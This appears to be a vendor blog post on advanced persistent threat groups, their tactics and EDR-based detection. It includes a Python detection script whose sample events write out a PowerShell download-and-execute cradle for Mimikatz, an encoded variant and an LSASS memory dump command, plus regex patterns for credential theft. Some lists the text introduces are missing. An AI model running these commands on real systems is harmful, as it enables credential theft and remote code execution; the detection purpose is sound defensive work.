Cyber criminals come in all shapes and sizes.
On one end of the spectrum, there's the script kiddie or inexperienced ransomware gang looking to make a quick buck. On the other end are state-sponsored groups using far more sophisticated tactics, often with long-term, strategic goals in mind.
Advanced Persistent Threat (APT) groups fall into this latter category.
Well-funded and made up of an elite squadron of hackers, these groups target high-value entities like governments, large corporations, or critical infrastructure. They often deploy multi-stage, multi-vector approaches with a high degree of obfuscation and persistence.
But for every small-to-medium-sized business (SMB) out there asking itself "Why would an APT group care about me?", we have the answer.
SMBs can be stepping stones to bigger targets, especially if they are part of a supply chain or serve larger entities. A whopping 93% of SMB execs even think nation-state hackers are using businesses like theirs as a backdoor into the country's digital defenses.
In this post, we'll break down how APT groups work, explain their tactics and evasive techniques, and show how to detect APT attacks.
The aim of APT groups is not a quick hit, but a long-term presence within a system, allowing them to gather as much information as they can while remaining undetected.
APTs stand apart from typical cybercriminals in several key ways:
An example of APT reconnaissance (RedStinger) as observed by the Malwarebytes Threat Intelligence Team
So, how does an APT work its dark magic? Here's a quick rundown:
While not all these steps are required in every case, and the time and effort expended on each can vary widely, this provides a general framework for understanding how APTs operate.
Alright, now that we know the basics of how APTs operate, let's dive into the specifics of their tactics, techniques, and procedures (TTPs).
TTP (MITRE ATT&CK) | Description
---|---
Phishing (Spearphishing Attachment, T1566.001; Spearphishing Link, T1566.002) | APT groups frequently initiate targeted spear-phishing attacks, often combined with social engineering and exploitation of software vulnerabilities, to gain initial access to a target network. The delivered payload then typically runs via User Execution (T1204) or direct Native API calls (T1106, formerly named "Execution through API").
In short, APT groups use methods like "living off the land" (abusing built-in administrative tools such as PowerShell, WMI, or rundll32 instead of dropping custom binaries), fileless malware (code that runs only in memory rather than from disk), encryption (to hide their command-and-control traffic), and anti-forensic measures (deleting logs and other evidence to cover their tracks).
Attribution is always a bit thorny when it comes to APT groups, but some groups are well-known and their origin has become clear. One naming convention (CrowdStrike's, which not everyone follows) labels Chinese APT actors "Pandas," Russian APTs "Bears," and Iranian APTs "Kittens."
Some examples:
Countries typically have different groups that focus on different targets, but generally speaking, some of the most frequently hit sectors are governments, aerospace, and telecommunications.
According to the cyber threat group list compiled by MITRE ATT&CK, we're aware of over 100 APT groups worldwide. The majority of these groups have ties to China, Russia, and Iran. In fact, China and Russia alone are reportedly connected to nearly 63% of all these known groups.
For the purposes of this article, I compiled data on 37 different APT groups listed by American cybersecurity firm Mandiant and broke them down by country. I also ran the numbers on the most frequently mentioned target industries; as this data comes from a relatively small sample size, treat these as rough estimates.
You've got a few tricks up your sleeve when it comes to detecting APTs on your network.
You can use Intrusion Detection and Prevention Systems (IDS/IPS for short), which watch your network traffic for known-bad patterns. Regular reviews of your logs and network can also give you clues.
Then there's following the breadcrumbs known as Indicators of Compromise (IoCs) and watching for unusual behavior from users or endpoints. But here's the thing: these threats are getting smarter and trickier.
That's where Endpoint Detection and Response (EDR) comes in. Let's take a look at how EDR can help level up your defense game against these APTs.
Consider, for example, the fairly common case of an APT group using Mimikatz, an open-source tool that pulls plaintext passwords, hashes, and Kerberos tickets out of Windows memory (chiefly the LSASS process), to extract credentials and escalate privileges. MITRE lists at least 8 APT groups observed using Mimikatz for this exact purpose.
Using Malwarebytes EDR, we can find suspicious activity like this and quickly isolate the endpoint it's associated with.
Clicking into a high-severity alert, we see a categorization of the rules that fired, which helps a newer or less experienced analyst understand what's going on with this process.
What we see here is the actual categorization of behaviors that Malwarebytes witnessed in this process. Each of these little bubbles has been color coded to help you understand the severity of this issue.
At the bottom, we have a detailed process timeline as well. Clicking into any of these nodes, we get a lot of rich context information about what this process did.
As a security analyst or an IT admin, the first questions you typically ask when an incident occurs are: What happened? Do we know if it's malicious? What is the actual extent of the potential damage? And so on.
We can see the exact time it ran and the file hashes, so if we need to investigate further, we have those available. And most importantly, the command line actually used to execute this technique on our machine is highlighted below.
This is very suspicious-looking code that could definitely be a sign of an APT on the network. This PowerShell command is downloading Mimikatz from a remote server and executing it directly. Let's remediate ASAP!
Closing this view, we find a "Respond" option in the upper-right corner with a drop-down menu to "Isolate Endpoint".
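The evasion methods described earlier (living off the land, fileless execution, encoded commands) and the PowerShell download-and-execute command line above are exactly what a process-creation detection rule looks for. The following is an added example, not code from the original post or from Malwarebytes: a small Python triage script that scores constructed Sysmon-style process-creation events against a few ATT&CK-mapped patterns, decoding any -EncodedCommand payload first so that base64 encoding alone does not hide a download cradle. The event records, hostnames, user names, rule weights, and the 198.51.100.7 address (from the RFC 5737 documentation range) are all made up for this example.

```python
import base64
import re


def encode_powershell(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (Sysmon Event ID 1 style fields, hand-written for
# this example). Not real data from the page, from Malwarebytes, or from any incident.
SAMPLE_EVENTS = [
    {"host": "WS-042", "user": "CORP\\jdoe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Exec Bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/Invoke-Mimikatz.ps1'); "
                "Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'\""},
    # Same download cradle, but hidden behind -EncodedCommand.
    {"host": "WS-042", "user": "CORP\\jdoe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NonInteractive -EncodedCommand "
                + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage2.ps1')")},
    # Living off the land: a signed Microsoft DLL used to dump LSASS memory.
    {"host": "SRV-DB1", "user": "NT AUTHORITY\\SYSTEM", "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\Windows\\Temp\\lsass.dmp full"},
    # Benign administrative activity that must not alert.
    {"host": "SRV-FS2", "user": "CORP\\svc_backup", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\nightly-backup.ps1"},
    {"host": "WS-017", "user": "CORP\\asmith", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami /all"},
]

# Each rule: (name, ATT&CK technique, regex, weight). The weights are this
# example's own choice, not a Malwarebytes or MITRE scoring scheme.
RULES = [
    ("PowerShell download cradle", "T1059.001",
     re.compile(r"(?i)(?:IEX|Invoke-Expression)\b.*(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"
                r"|(?:DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b).*(?:IEX|Invoke-Expression)\b"), 40),
    ("LSASS / Mimikatz credential dumping", "T1003.001",
     re.compile(r"(?i)mimikatz|sekurlsa::|lsadump::|comsvcs\.dll.*MiniDump|procdump.*lsass"), 60),
    ("Hidden window / execution-policy bypass", "T1059.001",
     re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-ex(?:ec|ecutionpolicy)?\s+bypass"), 20),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common spellings are listed.
ENCODED_ARG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def expand_encoded_command(cmdline: str):
    """Return (command line with any -EncodedCommand blob replaced by the decoded
    script, decoded script). If there is no valid encoded blob, return (cmdline, None)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline, None
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # not base64, wrong length, or not UTF-16LE
        return cmdline, None
    return cmdline[:m.start(1)] + script + cmdline[m.end(1):], script


def analyze_event(event: dict) -> dict:
    """Score one process-creation event against RULES, looking through encoding."""
    text, decoded = expand_encoded_command(event["cmdline"])
    hits = []
    if decoded is not None:
        hits.append(("Encoded PowerShell command", "T1027", 20))
    for name, technique, pattern, weight in RULES:
        if pattern.search(text):
            hits.append((name, technique, weight))
    score = sum(w for _, _, w in hits)
    severity = "high" if score >= 60 else "medium" if score >= 30 else "low" if score else "none"
    return {"host": event["host"], "user": event["user"], "score": score, "severity": severity,
            "techniques": sorted({t for _, t, _ in hits}), "rules": [n for n, _, _ in hits],
            "decoded_command": decoded}


def triage(events):
    """Return only the events that fired at least one rule, most severe first."""
    results = [analyze_event(e) for e in events]
    return sorted((r for r in results if r["score"]), key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"[{r['severity']:<6}] {r['host']:<8} {r['user']:<22} {', '.join(r['techniques'])}  "
              f"{', '.join(r['rules'])}")
        if r["decoded_command"]:
            print("         decoded:", r["decoded_command"])
```

Run it directly to print the triaged events: the plain and the encoded forms of the same cradle both fire the download-cradle rule once the encoding is undone, the comsvcs.dll MiniDump line is caught without any Mimikatz string at all, and the backup script and whoami stay silent. A real EDR rule set would also weigh the parent process (an Office application spawning PowerShell, say) and the user context rather than the command line alone.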
We have three layers of isolation that we can provide: network isolation, process isolation, and desktop isolation.
The network and process isolations are intended to give us the ability to quarantine that machine and prevent it from doing anything that is not authorized by Malwarebytes.
What this means is, we can still use our Malwarebytes console to trigger scans to perform other tasks and to review data, but the machine otherwise canβt communicate or run anything else.
Bam! This potential APT threat is blocked all in a matter of minutes.
Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to APT attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection.